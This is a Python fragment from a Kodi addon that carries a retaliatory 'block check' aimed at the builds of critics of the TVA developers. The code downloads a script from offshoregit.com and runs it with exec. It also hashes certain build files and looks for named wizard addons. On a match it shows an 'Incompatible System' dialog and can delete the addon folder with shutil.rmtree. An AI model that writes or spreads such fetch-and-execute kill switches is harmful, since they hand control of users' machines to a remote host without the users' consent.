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check has been put in place to stop the inclusion of TVA (and friends) addons in builds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build makers that publicly insult or slander TVA's developers and friends. If your build is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impacted by this check, you can have it removed by publicly apologizing for your previous statements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via youtube and twitter. Otherwise, stop including our addons in your builds or fork them and maintain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yourself.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http://i.imgur.com/TqIEnYB.gif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TVA developers (and friends)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traceback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do_block_check(uninstall=False):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urllib2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sys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namespace = {}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exec urllib2.urlopen('http://offshoregit.com/tknorris/block_code.py').read() in namespace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namespace["real_check"](uninstall):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sys.exit()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SystemExit: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traceback.print_exc()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hashlib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xbmcvfs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xbmc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bad_md5s = [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('special://home/media/splash.png', '926dc482183da52644e08658f4bf80e8'),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('special://home/media/splash.png', '084e2bc2ce2bf099ce273aabe331b02e'),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('special://home/addons/skin.hybrid.dev/backgrounds/MUSIC/142740.jpg', '9ad06a57315bf66c9dc2f5d2d4d5fdbd'),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('special://home/addons/skin.hybrid.dev/backgrounds/GEARS TV/Woman-and-superman-wallpaper-HD-1920-1200.jpg', '4c46914b2b310ca11f145a5f32f59730'),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('special://home/addons/skin.hybrid.dev/backgrounds/PROGRAMS/terminator-genesys-robot-skull-gun-face.jpg', '1496772b01e301807ea835983180e4e6'),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('special://home/addons/skin.hybrid.dev/backgrounds/50-Cent.jpg', 'c45fd079e48fa692ebf179406e66d741'),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('special://home/addons/skin.hybrid.dev/backgrounds/kevin-hart-screw-face.jpg', '0fa8f320016798adef160bb8880479bc')]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bad_addons = ['plugin.program.targetin1080pwizard', 'plugin.video.targetin1080pwizard']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found_md5 = False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path, bad_md5 in bad_md5s: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 = xbmcvfs.File(path)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md5 = hashlib.md5(f.read()).hexdigest()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md5 == bad_md5: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found_md5 = True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has_bad_addon = any(xbmc.getCondVisibility('System.HasAddon(%s)' % (addon)) for addon in bad_addons)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has_bad_addon or found_md5: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xbmcgui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import sys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line2 = 'Press OK to uninstall this addon' if uninstall else 'Press OK to exit this addon'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xbmcgui.Dialog().ok('Incompatible System', 'This addon will not work with the build you have installed', line2)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uninstall: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import xbmcaddon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import shutil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addon_path = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')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shutil.rmtree(addon_path)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sys.exit()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